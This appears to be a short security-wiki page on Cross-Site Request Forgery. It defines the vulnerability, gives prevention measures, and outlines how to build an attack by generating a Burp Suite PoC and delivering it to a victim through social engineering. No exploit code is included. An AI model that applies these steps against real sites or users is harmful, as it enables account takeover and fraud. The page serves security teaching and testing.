Links

CSRF

Introduction

Cross-Site Request Forgery (CSRF) is a type of web vulnerability that allows an attacker to send malicious requests to a website on behalf of a victim user. This can occur when a victim user is authenticated to a vulnerable website and has an active session. Then, the attacker tricks the victim into making a request to the website that includes malicious parameters.
For example, consider a situation where a victim user is logged into their online banking account. The attacker tricks the victim into clicking on a link that sends a request to transfer money from the victim's account to the attacker's account. If the website is vulnerable to CSRF, the transfer request will be executed by the website, even though the victim did not intentionally initiate the request.
To prevent CSRF attacks, websites can use techniques such as requiring a unique token to be included in all sensitive requests, or using same-site cookies to ensure that requests can only be initiated from the same website that the victim is currently visiting.

Crafting the attack

First of all, you need to analyze the website victim to see if the following conditions are met:
  • A relevant action that can be used to steal an account, escalate privileges, obtain a user's password or change a user's email.
  • Cookie-based session handling so the cookie will be sent to the website within the malicious request, but the user victim must be already logged in.
  • No unpredictable request parameters to perform any action that an attacker can not determine or guess. An example would be a nonce sent by the server or a CSRF token. Nonetheless, the latter sometimes is not bound to the session, thus an attacker can obtain a CSRF token with its account to use it in its malicious form.
Secondly, you need to craft a CSRF exploit that would be delivered to the user victim.
This can be achieved by the Burp Suite extension CSRF PoC generator. Right-click on the request and then go to Engagement tools/Generate CSRF PoC. The result will be an HTML code that, once accessed by the user victim, will send the malicious request to the website victim.
As an alternative, there is the website CSRF PoC Generator.
Thirdly, copy the generated HTML into a malicious web page and view it with a web browser, logged with a dummy account on the website victim, to test whether the intended request works.
Finally, deliver a link to the user victim and make it click through social engineering.

References

Last modified 1yr ago